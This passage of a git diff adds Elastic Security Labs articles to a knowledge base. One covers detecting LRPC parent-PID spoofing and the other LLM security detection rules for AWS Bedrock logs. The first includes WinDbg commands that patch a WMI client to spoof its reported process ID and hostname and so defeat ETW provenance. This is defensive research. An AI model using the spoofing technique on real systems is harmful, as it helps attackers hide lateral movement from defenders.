+In the RPC case, [`Microsoft-Windows-RPC`](https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-RPC.tsv) ETW events are very useful for identifying anomalous behaviours.
+
+Especially: - Event 5 - `RpcClientCallStart` (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel) - Event 6 - `RpcServerCallStart` (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)
+
+Additionally, `RpcClientCallStart` is generated by the client and `RpcServerCallStart` by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the `RpcClientCallStart` event.
+
+The RPC interface UUID and Procedure number combined with the caller details are (usually) sufficient to identify intent. For example, RPC interface UUID `{367ABB81–9844–35F1-AD32–98F038001003}` is the Service Control Manager Remote Protocol which exposes the ability to configure Windows services. The 12th procedure in this interface is `RCreateServiceW` which notoriously is the method that PsExec uses to execute processes on remote systems.
+
+For endpoint security vendors, however, there are a few issues to address before scalable robust `Microsoft-Windows-RPC` detections would be possible: 1. RPC event volumes are significant 2. There isn't an obvious mechanism to strongly correlate a client call with the resultant server call 3. There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior
+
+Let’s address these three issues one by one.
+
+### LRPC event volumes
+
+There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.
+
+### Correlating RPC server calls with their clients
+
+![Annotated MSDN RPC architecture](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image7.jpg)
+
+Modern Windows RPC has roughly three [transports](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/472083a9-56f1-4d81-a208-d18aef68c101): - TCP/IP (nacn_ip_tcp, nacn_http, ncadg_ip_udp and nacn_np over SMB) - inter-process Named Pipes (direct nacn_np) - inter-process ALPC (ncalrpc)
+
+The `RpcServerCallStart` event alone is not sufficient to determine if the call was inter-process. It needs to be correlated against a preceding `RpcCientCallStart` event, and [this correlation](https://stackoverflow.com/questions/41504738/how-to-correlate-rpc-calls-in-etw-traces) is unfortunately weak. At best you can identify a pair of `RpcServerCall` start/stop events that are bracketed by a pair of `RpcClientCall` events with the same parameters. (Note - for performance reasons, ETW events generated from different threads may arrive out of order). This means that you need to maintain a holistic RPC state - which creates an on-host storage and processing volume concern in order to address the event volume concern.
+
+More importantly though, the `RpcClientCallStart` events are generated in the client process where an adversary has already achieved execution and therefore can be [intercepted with very little effort](https://twitter.com/dez_/status/938074904666271744). There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.
+
+Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information - which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store [RPC State Information](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/enabling-rpc-state-information) which can then be used during debugging to [identify the client caller from the server thread](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/identifying-the-caller-from-the-server-thread). Unfortunately the Windows XP era documentation didn’t immediately work for Windows 10.
+
+It did provide a rough outline describing how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how [RPC Firewall](https://github.com/zeronetworks/rpcfirewall)handles network RPC - just with local endpoints).
+
+### Correlating RPC server calls and resultant behavior
+
+The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the `ExecuteShellCommand` method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like [`IDispatch::Invoke`](https://learn.microsoft.com/en-us/windows/win32/api/oaidl/nf-oaidl-idispatch-invoke)?
+
+We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.
+
+#### Introducing ETW’s ActivityId
+
+Thankfully, Microsoft had already thought of this scenario and [provides ETW tracing guidance](https://docs.microsoft.com/en-us/archive/msdn-magazine/2007/april/event-tracing-improve-debugging-and-performance-tuning-with-etw) to developers.
+
+![Annotated MSDN documentation for EventWriteEx](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image17.png)
+
+They suggest that developers generate and propagate a unique 128-bit `ActivityId` between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread as the value is stored in thread local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!
+
+It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to [`EventRegister`](https://learn.microsoft.com/en-us/windows/win32/api/evntprov/nf-evntprov-eventregister) calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image5.jpg)
+
+These GUIDs correspond to [`Microsoft-Windows-RPC`](https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC.tsv), [`Microsoft-Windows-Networking-Correlation`](https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-Networking-Correlation.tsv) and [`Microsoft-Windows-RPC-Events`](https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC-Events.tsv) respectively. Further, the RPC runtime helpfully wraps calls to `EventWrite` in just two places.
+
+The first call is in `McGenEventWrite\_EtwEventWriteTransfer` and looks like this:
+
+```
+`EtwEventWriteTransfer` (RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);
+```
+
+The NULL parameters mean that `ActivityId` will always be the configured per-thread `ActivityId` and `RelatedActivityId` will always be excluded in events logged by this code path.
+
+The second call is in `EtwEx\_tidActivityInfoTransfer` and looks like this:
+
+```
+`EtwEventWriteTransfer` (Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);
+```
+
+This means that `RelatedActivityId` will only ever be logged in `Microsoft-Windows-Networking-Correlation` events. RPC Runtime `ActivityId` s are (predominantly) created within a helper function that ensures that this correlation is always logged.
+
+![Ghidra decompilation for RPC ActivityId creation](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image14.jpg)
+
+Decompilation also revealed that the RPC runtime allocates ETW `ActivityId` s by calling `UuidCreate` , which generates a random 128-bit value. This is done in locations such as `NdrAysncClientCall` and `HandleRequest`. In other words, the client and server both individually allocate `ActivityId` s. This isn’t unsurprising because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct which would allow the client to propagate an ActivityId to the server. That’s okay though: we’re only currently missing the correlation between server call and the resultant behaviour. Also we don’t want to trust any potentially tainted client-supplied information.
+
+So now we know exactly how RPC intends to correlate activities triggered by RPC calls- by setting the per-thread ETW `ActivityId` and by logging RPC ActivityId correlations to `Microsoft-Windows-Networking-Correlation`. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the `ActivityId` appropriately.
+
+We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.
+
+Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The `ActivityId` is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s [RPC scalability](https://learn.microsoft.com/en-us/windows/win32/rpc/scalability) advice) then the causality correlation is implicitly broken.
+
+Further, kernel ETW events seem to universally log an `ActivityId` of `{00000000-0000-0000-0000-000000000000}` – even when the thread has a (user-mode) `ActivityId` configured. It is likely that the kernel implementation of `EtwWriteEvent` simply does not query the `ActivityId` which is stored in user-mode thread local storage.
+
+This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.
+
+A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the `Microsoft.Windows.ShellExecute` TraceLogging provider looked interesting). What would Microsoft do?
+
+### What would Microsoft do?
+
+More specifically, how does Microsoft populate the `ClientProcessId` in the `Microsoft-Windows-WMI-Activity` ETW event 23 (aka `Win32\_Process::Create` )?
+
+```
+`task_023` (UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)
+```
+
+Unlike RPC, WMI natively supports end-to-end tracing via a `CorrelationId` which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.
+
+But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?
+
+We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the [Sealighter](https://github.com/pathtofile/Sealighter) tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.
+
+In this case, the event was actually being written by `ntdll!EtwEventWrite` in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image9.jpg)
+
+Putting a breakpoint on `PublishWin32ProcessCreation` , we see via parameter value inspection that the `ClientProcessId` is passed (on the stack) as the 10th parameter. We can then look at `InspectWin32ProcessCreateExecution` to determine how the value that is passed in is determined.
+
+A roughly tidied Ghidra decompilation of `InspectWin32ProcessCreateExecution` might resemble this:
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image1.jpg)
+
+We can see that the client process id comes from the `CWbemNamespace` object. Searching for reference to this structure field, we find that it is only set in `CWbemNamespace::Initialize`. Our earlier stack trace started in `wbemcore!CCoreQueue` and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.
+
+We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the [WMI Protocol Initialization](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wmi/1106e73c-9a7c-4e25-9216-0a5d8e581d62) that explained much of this and might have saved a little time.
+
+We took the first approach. The second parameter to `InspectWin32ProcessCreateExecution` is an [`IWbemContext`](https://docs.microsoft.com/en-us/windows/win32/api/wbemcli/nn-wbemcli-iwbemcontext) – which allows the caller to provide additional information to providers. This is how the parameters to `Win32\_Process::Create` are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?
+
+`IWbemLevel1Login::NTLMLogin` stood out in the call traces as a good place to start looking.
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image24.jpg)
+
+And right next to its COM interface UUID was IWbemLoginClientID[Ex] which had a very interesting `SetClientInfo` call, which was documented on MSDN:
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image2.jpg)
+
+The WMI client calls `wbemprox!SetClientIdentity` which looks roughly like this:
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image18.jpg)
+
+`IWbemLoginClientIDEx` is currently undocumented, but we can infer the parameters from the values passed.
+
+At this point, it looks like the client process is passing `ClientMachineName` , `ClientMachineFQDN` , `ClientProcessId` and `ClientProcessCreationTime` to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.
+
+Using WinDbg, we set up a couple quick patches to the WMI client process and then spawned a process via WMI:
+
+```
+windbg> bp wbemprox!SetClientIdentity+0xff "eu @rdx \"SPOOFED....\"; gc"
+windbg> bp wbemprox!SetClientIdentity+0x1c4 "r r9=0n1337; eu @r8 \"SPOOFED.COM\"; gc"
+PS> ([wmiclass]"ROOT\CIMv2:Win32_Process").Create("calc.exe")
+```
+
+Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:
+
+![](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image12.jpg)
+
+The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.
+
+Further, a remote adversary can actually pass in a `ClientMachine` name equal to the local hostname and this WMI event will mistakenly log IsLocal as true. (See the earlier decompilation of `InspectWin32ProcessCreateExecution` ). This will make the event seem like a suspicious local execution rather than lateral movement, and represents another defence evasion opportunity.
+
+So, this isn’t an approach that other RPC servers should follow after all.
+
+## Conclusion
+
+In trying to generically solve LRPC provenance, we unfortunately demonstrate that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft where it was assessed as a next-version candidate bug that will be evaluated for future releases.
+
+Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.
+
+More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. In addition, you must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise adversaries will exploit the gaps.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_advances_llm_security.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_advances_llm_security.md
new file mode 100644
index 0000000000000..8ee18b67bde85
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_advances_llm_security.md
@@ -0,0 +1,252 @@
+---
+title: "Elastic Advances LLM Security with Standardized Fields and Integrations"
+slug: "elastic-advances-llm-security"
+date: "2024-05-06"
+subtitle: "Explore How Elastic's New LLM Security Strategies Enhance Detection, Standardization, and Protection Across the LLM Ecosystem"
+description: "Discover Elastic’s latest advancements in LLM security, focusing on standardized field integrations and enhanced detection capabilities. Learn how adopting these standards can safeguard your systems."
+author:
+  - slug: mika-ayenson
+  - slug: dan-kortschak
+  - slug: jake-king
+  - slug: susan-chang
+  - slug: andrew-kroh
+image: "Security Labs Images 4.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
+## Introduction
+
+Last week, security researcher Mika Ayenson [authored a publication](https://www.elastic.co/security-labs/embedding-security-in-llm-workflows) highlighting potential detection strategies and an LLM content auditing prototype solution via a proxy implemented during Elastic’s OnWeek event series. This post highlighted the importance of research pertaining to the safety of LLM technology implemented in different environments, and the research focus we’ve taken at Elastic Security Labs.
+
+Given Elastic's unique vantage point leveraging LLM technology in our platform to power capabilities such as the Security [AI Assistant](https://www.elastic.co/guide/en/security/current/security-assistant.html), our desire for more formal detection rules, integrations, and research content has been growing. This publication highlights some of the recent advancements we’ve made in LLM integrations, our thoughts around detections aligned with industry standards, and ECS field mappings.
+
+We are committed to a comprehensive security strategy that protects not just the direct user-based LLM interactions but also the broader ecosystem surrounding them. This approach involves layers of security detection engineering opportunities to address not only the LLM requests/responses but also the underlying systems and integrations used by the models.
+
+These detection opportunities collectively help to secure the LLM ecosystem and can be broadly grouped into five categories:
+
+ 1. **Prompt and Response**: Detection mechanisms designed to identify and mitigate threats based on the growing variety of LLM interactions to ensure that all communications are securely audited.
+ 2. **Infrastructure and Platform**: Implementing detections to protect the infrastructure hosting LLMs (including wearable AI Pin devices), including detecting threats against the data stored, processing activities, and server communication.
+ 3. **API and Integrations**: Detecting threats when interacting with LLM APIs and protecting integrations with other applications that ingest model output.
+ 4. **Operational Processes and Data**: Monitoring operational processes (including in AI agents) and data flows while protecting data throughout its lifecycle.
+ 5. **Compliance and Ethical**: Aligning detection strategies with well-adopted industry regulations and ethical standards. 
+
+![Securing the LLM Ecosystem: five categories](/assets/images/elastic-advances-llm-security/image4.png)
+Securing the LLM Ecosystem: five categories
+
+Another important consideration for these categories expands into who can best address risks or who is responsible for each category of risk pertaining to LLM systems. 
+
+Similar to existing [Shared Security Responsibility](https://www.cisecurity.org/insights/blog/shared-responsibility-cloud-security-what-you-need-to-know) models, Elastic has assessed four broad categories, which will eventually be expanded upon further as we continue our research into detection engineering strategies and integrations. Broadly, this publication considers security protections that involve the following responsibility owners:
+
+ - **LLM Creators**: Organizations who are building, designing, hosting, and training LLMs, such as OpenAI, Amazon Web Services, or Google
+ - **LLM Integrators**: Organizations and individuals who integrate existing LLM technologies produced by LLM Creators into other applications
+ - **LLM Maintainers**: Individuals who monitor operational LLMs for performance, reliability, security, and integrity use-cases and remain directly involved in the maintenance of the codebase, infrastructure, and software architecture
+ - **Security Users**: People who are actively looking for vulnerabilities in systems through traditional testing mechanisms and means. This may expand beyond the traditional risks discussed in [OWASP’s LLM Top 10](https://llmtop10.com/) into risks associated with software and infrastructure surrounding these systems
+
+This broader perspective showcases a unified approach to LLM detection engineering that begins with ingesting data using native Elastic [integrations](https://www.elastic.co/integrations); in this example, we highlight the AWS Bedrock Model Invocation use case. 
+
+## Integrating LLM logs into Elastic
+
+Elastic integrations simplify data ingestion into Elastic from various sources, ultimately enhancing our security solution. These integrations are managed through Fleet in Kibana, allowing users to easily deploy and manage data within the Elastic Agent. Users can quickly adapt Elastic to new data sources by selecting and configuring integrations through Fleet. For more details, see Elastic’s [blog](https://www.elastic.co/blog/elastic-agent-and-fleet-make-it-easier-to-integrate-your-systems-with-elastic) on making it easier to integrate your systems with Elastic.
+
+The initial ONWeek work undertaken by the team involved a simple proxy solution that extracted fields from interactions with the Elastic Security AI Assistant. This prototype was deployed alongside the Elastic Stack and consumed data from a vendor solution that lacked security auditing capabilities. While this initial implementation proved conceptually interesting, it prompted the team to invest time in assessing existing Elastic integrations from one of our cloud provider partners, [Amazon Web Services](https://docs.elastic.co/integrations/aws). This methodology guarantees streamlined accessibility for our users, offering seamless, one-click integrations for data ingestion. All ingest pipelines conform to ECS/OTel normalization standards, encompassing comprehensive content, including dashboards, within a unified package. Furthermore, this strategy positions us to leverage additional existing integrations, such as Azure and GCP, for future LLM-focused integrations.
+
+### Vendor selection and API capabilities
+
+When selecting which LLM providers to create integrations for, we looked at the types of fields we need to ingest for our security use cases. For the starting set of rules detailed here, we needed information such as timestamps and token counts; we found that vendors such as Azure OpenAI provided content moderation filtering on the prompts and generated content. LangSmith (part of the LangChain tooling) was also a top contender, as the data contains the type of vendor used (e.g., OpenAI, Bedrock, etc.) and all the respective metadata. However, this required that the user also have LangSmith set up. For this implementation, we decided to go with first-party supported logs from a vendor that provides LLMs. 
+
+As we went deeper into potential integrations, we decided to land with AWS Bedrock, for a few specific reasons. Firstly, Bedrock logging has [first-party support](https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html) to Amazon CloudWatch Logs and Amazon S3. Secondly, the logging is built specifically for model invocation, including data specific to LLMs (as opposed to other operations and machine learning models), including prompts and responses, and guardrail/content filtering. Thirdly, Elastic already has a [robust catalog](https://www.elastic.co/integrations/data-integrations?solution=all-solutions&category=aws) of integrations with AWS, so we were able to quickly create a new integration for AWS Bedrock model invocation logs specifically. The next section will dive into this new integration, which you can use to capture your Bedrock model invocation logs in the Elastic stack.
+
+### Elastic AWS Bedrock model integration
+
+#### Overview
+
+The new Elastic [AWS Bedrock](https://docs.elastic.co/integrations/aws_bedrock) integration for model invocation logs provides a way to collect and analyze data from AWS services quickly, specifically focusing on the model. This integration provides two primary methods for log collection: Amazon S3 buckets and Amazon CloudWatch. Each method is optimized to offer robust data retrieval capabilities while considering cost-effectiveness and performance efficiency. We use these LLM-specific fields collected for detection engineering purposes.
+
+Note: While this integration does not cover every proposed field, it does standardize existing AWS Bedrock fields into the gen_ai category. This approach makes it easier to maintain detection rules across various data sources, minimizing the need for separate rules for each LLM vendor.
+
+### Configuring integration data collection method
+
+#### Collecting logs from S3 buckets
+
+This integration allows for efficient log collection from S3 buckets using two distinct methods:
+
+ - **SQS Notification**: This is the preferred method for collecting. It involves reading S3 notification events from an AWS Simple Queue Service (SQS) queue. This method is less costly and provides better performance compared to direct polling. 
+ - **Direct S3 Bucket Polling**: This method directly polls a list of S3 objects within an S3 bucket and is recommended only when SQS notifications cannot be configured. This approach is more resource-intensive, but it provides an alternative when SQS is not feasible.
+
+#### Collecting logs from CloudWatch
+
+Logs can also be collected directly from CloudWatch, where the integration taps into all log streams within a specified log group using the filterLogEvents AWS API. This method is an alternative to using S3 buckets altogether. 
+
+#### Integration installation
+
+The integration can be set up within the Elastic Agent by following normal Elastic [installation steps](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html). 
+
+ 1. Navigate to the AWS Bedrock integration
+ 2. Configure the ```queue_url``` for SQS or ```bucket_arn``` for direct S3 polling.
+
+![New AWS Bedrock Elastic Integration](/assets/images/elastic-advances-llm-security/image2.png)
+
+### Configuring Bedrock Guardrails
+
+AWS Bedrock [Guardrails](https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails.html) enable organizations to enforce security by setting policies that limit harmful or undesirable content in LLM interactions. These guardrails can be customized to include denied topics to block specific subjects and content filters to moderate the severity of content in prompts and responses. Additionally, word and sensitive information filters block profanity and mask personally identifiable information (PII), ensuring interactions comply with privacy and ethical standards. This feature helps control the content generated and consumed by LLMs and, ideally, reduces the risk associated with malicious prompts.
+
+Note: other guardrail examples include Azure OpenAI’s [content and response](https://learn.microsoft.com/en-us/azure/ai-services/openai/concepts/content-filter?tabs=warning%2Cpython-new) filters, which we aim to capture in our proposed LLM standardized fields for vendor-agnostic logging. 
+
+![AWS Bedrock Guardrails](/assets/images/elastic-advances-llm-security/image1.png)
+
+When LLM interaction content triggers these filters, the response objects are populated with ```amazon-bedrock-trace``` and ```amazon-bedrock-guardrailAction``` fields, providing details about the Guardrails outcome, and nested fields indicating whether the input matched the content filter. This response object enrichment with detailed filter outcomes improves the overall data quality, which becomes particularly effective when these nested fields are aligned with ECS mappings.
+
+### The importance of ECS mappings
+
+Field mapping is a critical part of the process for integration development, primarily to improve our ability to write broadly scoped and widely compatible detection rules. By standardizing how data is ingested and analyzed, organizations can more effectively detect, investigate, and respond to potential threats or anomalies in logs ingested into Elastic, and in this specific case, LLM logs.
+
+Our initial mapping begins by investigating fields provided by the vendor and existing gaps, leading to the establishment of a comprehensive schema tailored to the nuances of LLM operations. We then reconciled the fields to align with our OpenTelemetry [semantic conventions](https://github.com/open-telemetry/semantic-conventions/blob/main/docs/gen-ai/llm-spans.md). These mappings shown in the table cover various aspects:
+
+ - **General LLM Interaction Fields**: These include basic but critical information such as the content of requests and responses, token counts, timestamps, and user identifiers, which are foundational for understanding the context and scope of interactions.
+ - **Text Quality and Relevance Metric Fields**: Fields measuring text readability, complexity, and similarity scores help assess the quality and relevance of model outputs, ensuring that responses are not only accurate but also user-appropriate. 
+ - **Security Metric Fields**: This class of metrics is important for identifying and quantifying potential security risks, including regex pattern matches and scores related to jailbreak attempts, prompt injections, and other security concerns such as hallucination consistency and refusal responses.
+ - **Policy Enforcement Fields**: These fields capture details about specific policy enforcement actions taken during interactions, such as blocking or modifying content, and provide insights into the confidence levels of these actions, enhancing security and compliance measures.
+ - **Threat Analysis Fields**: Focused on identifying and quantifying potential threats, these fields provide a detailed analysis of risk scores, types of detected threats, and the measures taken to mitigate these threats.
+ - **Compliance Fields**: These fields help ensure that interactions comply with various regulatory standards, detailing any compliance violations detected and the specific rules that were triggered during the interaction.
+ - **OWASP Top Ten Specific Fields**: These fields map directly to the OWASP Top 10 risks for LLM applications, helping to align security measures with recognized industry standards.
+ - **Sentiment and Toxicity Analysis Fields**: These analyses are essential to gauge the tone and detect any harmful content in the response, ensuring that outputs align with ethical guidelines and standards. This includes sentiment scores, toxicity levels, and identification of inappropriate or sensitive content.
+ - **Performance Metric Fields**: These fields measure the performance aspects of LLM interactions, including response times and sizes of requests and responses, which are critical for optimizing system performance and ensuring efficient operations.
+
+![General, quality, security, policy, and threat analysis fields](/assets/images/elastic-advances-llm-security/image5.png)
+
+![Compliance, OWASP top 10, security tools analysis, sentiment and toxicity analysis, and performance fields](/assets/images/elastic-advances-llm-security/image6.png)
+
+Note: See the [gist](https://gist.github.com/Mikaayenson/cf03f6d3998e16834c1274f007f2666c) for an extended table of fields proposed.
+
+These fields are mapped by our LLM integrations and ultimately used within our detections. As we continue to understand the threat landscape, we will continue to refine these fields to ensure additional fields populated by other LLM vendors are standardized and conceptually reflected within the mapping.
+
+### Broader Implications and Benefits of Standardization
+
+Standardizing security fields within the LLM ecosystem (e.g., user interaction and application integration) facilitates a unified approach to the security domain. Elastic endeavors to lead the charge by defining and promoting a set of standard fields. This effort not only enhances the security posture of individual organizations but also fosters a safer industry. 
+
+**Integration with Security Tools**: By standardizing responses from LLM-related security tools, it enriches security analysis fields that can be shipped with the original LLM vendor content to a security solution. If operationally chained together in the LLM application’s ecosystem, security tools can audit each invocation request and response. Security teams can then leverage these fields to build complex detection mechanisms that can identify subtle signs of misuse or vulnerabilities within LLM interactions. 
+
+**Consistency Across Vendors**: Insisting that all LLM vendors adopt these standard fields drives a singular goal to effectively protect applications, but in a way that establishes a baseline that all industry users can adhere to. Users are encouraged to align to a common schema regardless of the platform or tool. 
+
+**Enhanced Detection Engineering**: With these standard fields, detection engineering becomes more robust and the change of false positives is decreased. Security engineers can create effective rules that identify potential threats across different models, interactions, and ecosystems. This consistency is especially important for organizations that rely on multiple LLMs or security tools and need to maintain a unified platform.
+
+#### Sample LLM-specific fields: AWS Bedrock use case
+
+Based on the integration’s ingestion pipeline, field mappings, and processors, the AWS Bedrock data is cleaned up, standardized, and mapped to Elastic Common Schema ([ECS](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html)) fields. The core Bedrock fields are then introduced under the ```aws.bedrock``` group which includes details about the model invocation like requests, responses, and token counts. The integration populates additional fields tailored for the LLM to provide deeper insights into the model’s interactions which are later used in our detections.  
+
+### LLM detection engineering examples
+
+With the standardized fields and the Elastic AWS Bedrock integration, we can begin crafting detection engineering rules that showcase the proposed capability with varying complexity. The below examples are written using [ES|QL](https://www.elastic.co/guide/en/security/8.13/rules-ui-create.html#create-esql-rule).
+
+Note: Check out the detection-rules [hunting](https://github.com/elastic/detection-rules/tree/main/hunting) directory and [```aws_bedrock```](https://github.com/elastic/detection-rules/tree/main/rules/integrations/aws_bedrock) rules for more details about these queries.
+
+#### Basic detection of sensitive content refusal
+
+With current policies and standards on sensitive topics within the organization, it is important to have mechanisms in place to ensure LLMs also adhere to compliance and ethical standards. Organizations have an opportunity to monitor and capture instances where an LLM directly refuses to respond to sensitive topics.
+
+**Sample Detection**:
+
+```
+from logs-aws_bedrock.invocation-*
+ | WHERE @timestamp > NOW() - 1 DAY
+   AND (
+     gen_ai.completion LIKE "*I cannot provide any information about*"
+     AND gen_ai.response.finish_reasons LIKE "*end_turn*"
+   )
+ | STATS user_request_count = count() BY gen_ai.user.id
+ | WHERE user_request_count >= 3
+```
+
+**Detection Description**: This query is used to detect instances where the model explicitly refuses to provide information on potentially sensitive or restricted topics multiple times. Combined with predefined formatted outputs, the use of specific phrases like "I cannot provide any information about" within the output content indicates that the model has been triggered by a user prompt to discuss something it's programmed to treat as confidential or inappropriate. 
+
+**Security Relevance**: Monitoring LLM refusals helps to identify attempts to probe the model for sensitive data or to exploit it in a manner that could lead to the leakage of proprietary or restricted information. By analyzing the patterns and frequency of these refusals, security teams can investigate if there are targeted attempts to breach information security policies.
+
+### Potential denial of service or resource exhaustion attacks
+
+Due to the engineering design of LLMs being highly computational and data-intensive, they are susceptible to resource exhaustion and denial of service (DoS) attacks. High usage patterns may indicate abuse or malicious activities designed to degrade the LLM’s availability. Due to the ambiguity of correlating prompt request size directly with token count, it is essential to consider the implications of high token counts in prompts which may not always result from larger requests bodies. Token count and character counts depend on the specific model, where each can be different and is related to how embeddings are generated. 
+
+**Sample Detection**:
+
+```
+from logs-aws_bedrock.invocation-*
+ | WHERE @timestamp > NOW() - 1 DAY
+   AND (
+     gen_ai.usage.prompt_tokens > 8000 OR
+     gen_ai.usage.completion_tokens > 8000 OR
+     gen_ai.performance.request_size > 8000
+   )
+ | STATS max_prompt_tokens = max(gen_ai.usage.prompt_tokens),
+         max_request_tokens = max(gen_ai.performance.request_size),
+         max_completion_tokens = max(gen_ai.usage.completion_tokens),
+         request_count = count() BY cloud.account.id
+ | WHERE request_count > 1
+ | SORT max_prompt_tokens, max_request_tokens, max_completion_tokens DESC
+```
+
+**Detection Description**: This query identifies high-volume token usage which could be indicative of abuse or an attempted denial of service (DoS) attack. Monitoring for unusually high token counts (input or output) helps detect patterns that could slow down or overwhelm the system, potentially leading to service disruptions. Given each application may leverage a different token volume, we’ve chosen a simple threshold based on our existing experience that should cover basic use cases.
+
+**Security Relevance**: This form of monitoring helps detect potential concerns with system availability and performance. It helps in the early detection of DoS attacks or abusive behavior that could degrade service quality for legitimate users. By aggregating and analyzing token usage by account, security teams can pinpoint sources of potentially malicious traffic and take appropriate measures.
+
+#### Monitoring for latency anomalies
+
